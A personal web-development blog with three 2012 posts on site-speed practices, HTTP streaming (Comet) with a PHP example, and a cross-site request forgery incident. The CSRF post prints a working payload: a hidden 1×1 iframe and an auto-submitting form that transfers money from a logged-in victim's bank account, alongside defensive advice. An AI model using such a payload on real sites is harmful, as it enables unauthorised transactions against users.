Welcome to my blog. GeekAndPirate is all about web programming tricks, tools and techniques that I will be sharing with you. I will also be sharing tricks and techniques for hacking stuff (yeah, that's true!!), and I'd like to talk about the latest developments in the world of the WEB. So stick with me!
December 17, 2012
What makes a website good? Is it the looks and presentation, created by a combination of some cool CSS and images? Or is it pure functionality: the features it provides and its user-friendliness, never mind the looks? Well, for some people looks matter, while others prefer functionality. But in reality, a web developer really has to balance these things while creating a web application, if he is expecting something out of it.
But having said that, many web developers ignore speed, which is a really crucial factor in a site's popularity. They are so busy improving looks and functionality that they simply overlook this important aspect. Speed is especially crucial for a professional, business-oriented site: the investors want to monetize their investment as much as possible, and a slow site means potential loss of business. Many developers think that speed is no longer important nowadays due to faster network connections. This is not true, because as network bandwidth increases, sites take more and more advantage of it and act as data hubs. Ten years back we were using dial-up connections with bandwidth of a few KBs at most, and the sites of that time were built to suit those connections. We now have broadband and wireless connections with speeds of several Mbps, and correspondingly we have more data-hungry sites like YouTube. So in short, one cannot depend on the network.
So what makes a site run ‘slower’? Or in other words, what should one do to make a site run ‘faster’? Well, it involves several factors, on both the client and the server side.
Let’s see some of the best practices a web developer must follow to improve the speed of a site.
Reduce HTTP Requests –
Combine files – Combine all script files into a single script wherever possible. This results in fewer HTTP requests.
CSS Sprites – Combine your background images into a single image and use the CSS background-image and background-position properties to display the desired part of it.
This is a very important factor in a site’s speed. If you are able to reduce the number of HTTP requests, you have almost won the battle.
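As a sketch of the sprite technique (the file name and offsets here are made up), a single sprites.png containing two 16-pixel icons stacked vertically might be used like this:

```css
/* Both icons come from one combined image, so only one HTTP request is made. */
.icon-home, .icon-search {
    background-image: url('sprites.png');  /* hypothetical combined image */
    width: 16px;
    height: 16px;
}
.icon-home   { background-position: 0 0; }      /* show the top icon */
.icon-search { background-position: 0 -16px; }  /* show the icon 16px further down */
```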
Add a Cache-Control or Expires header –
If the site has static elements that will essentially last forever, you can set a far-future Expires header. In this case the browser will cache those elements, and when the page is visited again they will be loaded from the browser cache rather than requested from the server.
If the site serves dynamic content, you can use an appropriate Cache-Control header instead.
Keep in mind that if you decide to change such an element, you should use a different file name, which will force the browser to make an HTTP request for it rather than loading it from the cache. If the same name is used, the old (and outdated) element will be served from the cache.
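For example, the response headers for a long-lived static image might look like this (the date and max-age value are illustrative):

```
Expires: Thu, 31 Dec 2037 23:59:59 GMT
Cache-Control: max-age=31536000
```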
Gzip compression –
Very few developers know about gzip. It is a compression method that reduces the size of the HTTP response. The client (browser) initiates the request with the following header –
Accept-Encoding: gzip, deflate
When the server encounters this header, it compresses the response with the gzip compression method. This reduces the size of the HTTP response, making it faster to travel across the network. The server indicates this in its response with the following header –
Content-Encoding: gzip
Put stylesheets at the top –
Putting stylesheets at the top makes the page render progressively, giving a good user experience. The HTML specification suggests that stylesheets be included in the <head> section. If they are placed at the bottom, the user will see a white page for longer, especially on slower connections, which makes for a bad user experience.
Load scripts Asynchronously –
According to the HTTP/1.1 specification, a browser should not download more than two components of a page from the same domain in parallel. Scripts are worse: only one can download at a time, and while a script is loading the browser halts the download of the remaining components of the page until it finishes, resulting in a bad user experience. Loading scripts asynchronously makes parallel download possible: the page does not wait for the script to finish, but keeps downloading the other components.
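In modern browsers this can be done with the async or defer attribute; the script names below are hypothetical:

```html
<!-- Downloads in parallel with the rest of the page and runs as soon as it arrives -->
<script async src="analytics.js"></script>

<!-- Downloads in parallel but runs only after the document has been parsed -->
<script defer src="widgets.js"></script>
```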
Minification –
Minification is the process of removing unnecessary code from a file, including unneeded characters, spaces, new lines, tabs and comments. This significantly reduces the size of the file, which in turn reduces its load time.
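A tiny illustration: the two functions below behave identically, but the minified version is a fraction of the size.

```javascript
// Readable source, as a developer would write it
function addNumbers(firstValue, secondValue) {
    // add the two values and return the sum
    return firstValue + secondValue;
}

// The same function after minification: comments, whitespace and
// long names are stripped, but behaviour is unchanged
function a(b,c){return b+c}

console.log(addNumbers(2, 3)); // 5
console.log(a(2, 3));          // 5
```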
Remove Duplicate Scripts –
If proper care is not taken, there is a chance of loading the same script twice. This not only causes an extra HTTP request, it also takes additional time to evaluate the script. It happens mainly when a developer has split the document into multiple sections and the file is accidentally included in more than one place.
Split Components Across Domains –
Splitting components across domains lets you maximize parallel downloads. Static content of the site, like banner images and CSS, can reside on a different domain, which results in faster downloads.
No HTML image scaling –
Don’t use the width and height attributes of the HTML <img> tag to scale images down. If you have a div of size 200 × 200, use an image of that size rather than a bigger version, e.g. 500 × 500 scaled down to 200 × 200. The oversized image only makes the page load slower.
Avoid image tags with an empty src attribute –
The browser will request the server for the image anyway. This not only slows down the page response time, it also wastes server computation time processing that request.
Use CDN –
Use a Content Delivery Network (CDN) to spread your content across servers in various geographical locations. A user’s distance from the server affects the speed of the site; proximity to a server means improved speed from the user’s perspective.
December 17, 2012
I really like Gmail. In fact, I LOVE it, and I am pretty sure you do too. It is simple, slick and elegant, yet powerful and rich in functionality. Many of us rely on Gmail for our daily business tasks.
So what’s special about Gmail? Its easy-to-use interface, slick design, highly customizable options, chat integrated right into your account… the list goes on. And the question for the geeks and the tech-savvy: what’s so special about Gmail from a web technology point of view? AJAX? JSON? Hmmm… well, I won’t say you are wrong, but those are somewhat old terms nowadays, and to be frank you don’t have to be an expert to know them; a high-school graduate will tell you what AJAX means, its states and response codes, how JSON works, blah blah…
So what’s the big deal? Ain’t Gmail using AJAX? Well yes… it is using AJAX, but in a somewhat different way. Let me give an example. You have opened your inbox and dealt with all your emails (read, replied, deleted, marked as read or, far less likely, marked as spam), so that you have no unread mail in your inbox. You confirm this by hitting the ‘Refresh’ link in your inbox, which sends a request to the server to check whether any new mail is waiting for you. This is an AJAX request that the client (your browser) initiates; the server responds accordingly, the client renders the result by manipulating the DOM, and you see the new messages in your inbox, if any.
But notice that new mail also appears in your inbox on its own, without you hitting Refresh. Back to our question: if that was not the client making periodic calls to the server in the background, then what was it?? Well, that’s what HTTP STREAMING is all about, and you have been using it without being aware of it! So what is it all about?
HTTP streaming is referred to by many terms: Comet, Ajax Push, Reverse Ajax, Two-Way Web, HTTP Server Push… So what is the basic difference between HTTP streaming and AJAX? Let me briefly repeat how AJAX works. In AJAX, the client initiates communication with the server using an XmlHttpRequest object; the server processes the request and sends the response in the form of XML, JSON or plain HTML. The browser reads this response and manipulates the DOM, and then the connection is closed. To get updated information, the client has to re-initiate the request to the server.
But HTTP streaming (Comet) is somewhat different. It has the following lifecycle –
1) The client initiates a connection with the server. This can be achieved with several techniques, such as a hidden IFRAME or an XmlHttpRequest object.
2) The server processes the request and sends data back to the client. But in this case it does not close the connection; it keeps it open and listens for new events. Whenever new data becomes available, the server ‘pushes’ it to the client. Because data is pushed as and when available, this is called ‘long polling’. It is, in short, a ‘push’ technology, where the publisher of the information (the server) pushes the data, whereas a traditional AJAX call is a ‘pull’ technology, where the client initiates a connection to fetch specific data.
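The client side of this lifecycle can be sketched in JavaScript as a loop that re-issues the request as soon as one completes. Here request stands for any function returning a promise of the server’s next update (in a browser it might wrap fetch or XmlHttpRequest); all the names are illustrative:

```javascript
// Long-polling sketch: ask for an update, hand it to the callback,
// then immediately ask again while shouldContinue() says to keep going.
function poll(request, onData, shouldContinue) {
    return request().then(function (data) {
        onData(data);                                     // render the pushed update
        if (shouldContinue()) {
            return poll(request, onData, shouldContinue); // re-open the "connection"
        }
    });
}
```

In a browser, request could be something like () => fetch('/updates').then(r => r.json()), with onData updating the DOM.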
Comet-like applications offer real-time interaction by relying on a persistent HTTP connection, which acts like a stream of data between client and server; hence the name HTTP streaming. This method is really useful for modern web applications where real-time interaction is vital. Consider a share-trading web application: it is crucial to display share prices in real time, so that a user of the application can decide to buy or sell accordingly.
Let’s take a simple server-side example of this technique. Consider the share-trading app. When a request is made from the client, the server first processes it and then flushes the price of the share to the browser. But neither side closes the connection, and the server keeps listening for the next event, in this case a change in the share price. The server code (PHP here) will look somewhat like this:
<?php
while (true) {  // never-ending loop: keep the connection open
    $share_price = get_share_price();
    echo "<script>document.getElementById('price').innerHTML = '$share_price';</script>";
    flush();    // push the update to the browser immediately
    sleep(1);
}
The <script> tag makes the browser render the share price. The server then listens for changes in the share price in its never-ending loop, and a response is sent to the browser as and when there is a change, creating a real-time system where changes are immediately communicated to the browser.
Comet-like functionality can also be observed on social networking sites like Facebook, where a user’s wall gets updated as and when a new feed item is published by the server.
As the web evolves, we may see many more cool, real-time web applications like Gmail using Comet-like technologies in the near future!
December 17, 2012
I have many people from various domains in my circle of friends: doctors, architects, businessmen and so on. Many of them rely heavily on the internet, and naturally they are not much aware of its potential threats. Like them, many people don’t take basic precautions such as logging out after they finish or using the latest, more secure browsers, and sometimes they face the consequences of that lack of knowledge. Sometimes it is not the user’s fault at all: the developers of a website make the site vulnerable by not following good programming practices and not implementing adequate security measures, and their users have to pay for it.
One weekend, when I was hanging out with my friends, one of them told me about an incident that took place while he was performing some online transactions. He said that while he was doing transactions with his bank account, someone got unauthorized access to the account and transferred money out of it. Luckily for him the amount was not much, but he is now reluctant to make any online transaction.
I decided to hunt down this incident. There was no question of him giving away his account details, knowingly or unknowingly, as he said he keeps the password nowhere but in his brain (:)). Nor had he been phished by clicking some unknown link displaying a site similar to the bank’s. I asked him what else he was browsing while doing those online transactions. He said he was exploring various demand-and-supply forums, where you make a wish for a particular video, piece of music or software, and other members of the forum fulfil it.
I decided to take a look at those sites, and I quickly realized that those forums are occupied not only by music and video lovers but also by many crackers. I looked specifically at the threads my friend had visited, and I found what I was suspecting. My friend was a victim of what is called ‘Cross-Site Request Forgery’ (CSRF or XSRF).
CSRF is an attack initiated by a user against a website. Here the website ‘trusts’ the user, and that trust is exploited to pass unauthorized commands; in the related attack, cross-site scripting (XSS), it is the user who trusts the site. In a CSRF attack, the attacker exploits the fact that the legitimate user is already ‘authenticated’ to the site, with the authentication info stored in a session cookie. The attacker rides on that cookie to fire unauthorized commands as the victim. Let’s see what may have happened in my friend’s case.
I viewed the HTML code of the forum thread my friend had visited, and in one reply, posted by a certain Mr. XX, I saw an HTML iframe tag:
<iframe src="http://xyz.com/transfer.php" width="1" height="1"></iframe>
I was able to track down transfer.php, and saw the following code:
<form name="frm1" action="https://bankdomain.com/transfer" method="post">
<input type="hidden" name="toname" value="andh12">
<input type="hidden" name="amt" value="100">
</form>
<script>document.frm1.submit();</script>
The invisible 1 × 1 iframe loads this page, the script submits the form automatically, and the browser helpfully attaches my friend’s bank session cookie to the request.
CSRF attacks have the following characteristics –
– They are made against authenticated users, exploiting the site’s trust in those users.
– They trick the user’s web browser into sending unauthorized HTTP requests.
– Both user and browser are let down by improper implementation of the web application’s security measures around authentication and authorization.
A normal user can do very little to prevent this kind of attack, beyond avoiding malicious websites and forums and not clicking links in spam mail. The web application bears the larger responsibility, and can prevent such attacks by –
– Checking the HTTP Referer header: the web app can check whether the referrer is the one it should be.
– Limiting the lifetime of authentication cookies.
– Generating a user-specific secret token that the client (browser) must send with each HTTP request.
– Logging the user out automatically after a period of inactivity.
There are certain conditions, though, that must be fulfilled for the attacker to carry out this attack –
– The attacker must lure the victim to a webpage containing the malicious code while the victim is logged in.
– The attacker must identify the form submission URL and pass the exact values that form expects.
– If the site checks the HTTP Referer header, the attacker must spoof it.
So the moral of the story is: as a normal user, you should be careful while surfing the internet. If you access sensitive sites such as your bank, use a separate browser for them and another browser for the rest of your sites. Always log off when you are done. And if you are a web developer, you should implement security mechanisms to counter these attacks.